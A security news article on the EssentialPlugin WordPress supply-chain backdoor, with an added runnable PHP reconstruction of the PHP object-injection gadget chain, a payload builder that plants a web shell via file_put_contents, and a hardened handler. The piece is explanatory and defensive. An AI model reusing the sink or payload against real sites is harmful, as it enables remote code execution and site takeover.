EssentialPlugin WordPress Supply Chain Attack Plants Backdoor in 20+ Plugins After Malicious Flippa Sale
A supply-chain compromise has hit more than 20 WordPress plugins from EssentialPlugin: after the vendor was sold to a malicious buyer on Flippa, the new owner planted a PHP object-injection backdoor that lay dormant for seven months before being triggered on April 5, 2026.

A sophisticated supply-chain attack has compromised more than 20 WordPress plugins developed by EssentialPlugin, after the original vendor sold the company to a malicious buyer on the Flippa marketplace in 2025. The attacker, identified only as "Kris," planted a PHP object-injection backdoor across all plugins that remained dormant for seven months before being triggered on April 5, 2026. The WordPress Plugins Review team confirmed the attack on April 7 and permanently closed all affected plugins in the directory, pushing a forced security update to remove the backdoor and warn administrators.
The backdoor was introduced in September 2025 under the seemingly innocuous commit message "[*] Check compatibility with WordPress version 6.8.2." The malicious code registered an unauthenticated REST API endpoint that fetched a serialized PHP object from the attacker's server at analytics.essentialplugin.com and passed the response directly to PHP's `unserialize()` function, a classic PHP object injection sink. Deserializing attacker-controlled data is only exploitable when the loaded code contains a usable gadget chain; here the attacker supplied one inside the plugin's own code, giving arbitrary file write and command execution.
The gadget chain runs through the `Wpos_Anylc_Admin` class, whose properties include `$write` (defaulting to `update_option`), `$version_cache` and `$changelog`. After deserialization, the `version_info_clean()` method checks whether the attacker-controlled `$status` property is set to 'valid' and then invokes the callable held in `$write` (read into a local `$clean`) as `$clean($this->version_cache, $this->changelog)`. By returning a crafted serialized object, the attacker can set `$write` to `file_put_contents`, `$version_cache` to a path such as `/var/www/html/wp-comments-posts.php`, and `$changelog` to arbitrary PHP code, dropping a web shell and achieving full remote code execution. Since the callable and both of its arguments are attacker-chosen, the same chain can also call a command-execution function directly.
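The following is an added illustration, not code from EssentialPlugin or Patchstack: a minimal reconstruction of the pattern described above, runnable from the PHP CLI without WordPress or network access. The class, property and method names come from the article; the wiring inside `version_info_clean()` (copying `$write` into `$clean` and calling it) and the handler function names are assumptions for the demo. It shows the vulnerable sink, the payload the attacker's server would need to return, and a hardened handler that cannot be driven this way.

```php
<?php
// Added example (reconstruction, not the plugin's real source).

// --- 1. Gadget: a class from the plugin's own code base -------------------
class Wpos_Anylc_Admin {
    public $write         = 'update_option';  // benign default callable
    public $version_cache = 'wpos_version';   // first argument passed to $write
    public $changelog     = '';               // second argument passed to $write
    public $status        = 'invalid';

    // Assumed wiring: fires only when the remote object says 'valid', then
    // calls whatever callable the deserialized object carries in $write.
    public function version_info_clean() {
        if ($this->status !== 'valid') {
            return false;
        }
        $clean = $this->write;
        return $clean($this->version_cache, $this->changelog);
    }
}

// --- 2. Vulnerable sink: REST callback body -> unserialize() ---------------
// In the plugin this ran behind an unauthenticated REST route (in WordPress
// terms, a permission_callback of '__return_true') and $remote_body was the
// response from analytics.essentialplugin.com. Here the caller passes it in.
function wpos_vulnerable_handler(string $remote_body) {
    $obj = unserialize($remote_body);         // PHP object injection sink
    if ($obj instanceof Wpos_Anylc_Admin) {
        return $obj->version_info_clean();
    }
    return false;
}

// --- 3. Constructed payload: what the attacker's server would return --------
function wpos_build_payload(string $path, string $php_code): string {
    $g = new Wpos_Anylc_Admin();
    $g->write         = 'file_put_contents';  // swap the callable
    $g->version_cache = $path;                // becomes the target path
    $g->changelog     = $php_code;            // becomes the file contents
    $g->status        = 'valid';
    return serialize($g);
}

// --- 4. Hardened equivalent -----------------------------------------------
// Remote version/changelog data is structured data and never needs
// unserialize(). json_decode(..., true) yields only arrays and scalars, so
// no class in the code base can be instantiated by the response. If a legacy
// format really must be unserialized, pass ['allowed_classes' => false], which
// turns any object into __PHP_Incomplete_Class with no callable methods.
function wpos_safe_handler(string $remote_body): array {
    $data = json_decode($remote_body, true);
    if (!is_array($data) || !isset($data['version'])) {
        return ['ok' => false];
    }
    $version = preg_replace('/[^0-9.]/', '', (string) $data['version']);
    return ['ok' => true, 'version' => $version];
}

// Demo: write to a temp file rather than the web root.
$target  = sys_get_temp_dir() . '/wp-comments-posts.php';
$payload = wpos_build_payload($target, "<?php echo 'backdoor'; ?>");

wpos_vulnerable_handler($payload);
var_dump(file_exists($target));           // bool(true): arbitrary file written
var_dump(wpos_safe_handler($payload));    // ['ok' => false]: serialized blob rejected
var_dump(wpos_safe_handler('{"version":"6.8.2"}')); // ['ok' => true, 'version' => '6.8.2']
unlink($target);
```

The point of the hardened handler is that the fix is not a better gadget-free class but the removal of the sink: once the endpoint no longer deserializes objects and no longer accepts unauthenticated callers, the server-side switch the attacker relied on has nothing to flip.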
Affected plugins include widely used tools such as WP Logo Showcase Responsive Slider and Carousel, Countdown Timer Ultimate, Popup Maker and Popup Anything, and many others, each with thousands of active installs. Because the backdoor was triggered only on April 5, 2026, the malicious code sat dormant in the plugin codebase for seven months. The attack also depended on the attacker's server returning a malicious payload, so the compromise was centrally controlled and could be switched on or off at will.
The WordPress Plugins Review team acted quickly after confirming the attack on April 7: it permanently closed all affected plugins in the directory and pushed a forced security update to all sites running the compromised code. The update attempts to remove the backdoor and warn administrators. Patchstack has published vulnerability entries for all affected plugins and released a mitigation rule that partially covers one of the exploitation scenarios.
This incident is a textbook example of the risks inherent in the plugin marketplace model, where original developers sell their creations to third parties without adequate vetting. The sale on Flippa, a popular marketplace for buying and selling online businesses, allowed a malicious actor to acquire a trusted vendor identity and inject backdoors into code that had been considered safe for years. The attack underscores the importance of monitoring plugin and theme ownership changes, and the need for automated security scanning of every code change, even a seemingly benign one.
Administrators running any EssentialPlugin plugins are urged to update immediately to the latest versions and verify that the forced security update has been applied. Sites that were exposed between April 5 and April 7 should be treated as fully compromised and undergo a complete forensic investigation, including a check for unexpected PHP files in the web root such as the `wp-comments-posts.php` path used in the gadget chain. The incident also raises questions about the security of the WordPress plugin ecosystem and the need for more rigorous review of code changes, especially after vendor ownership transfers.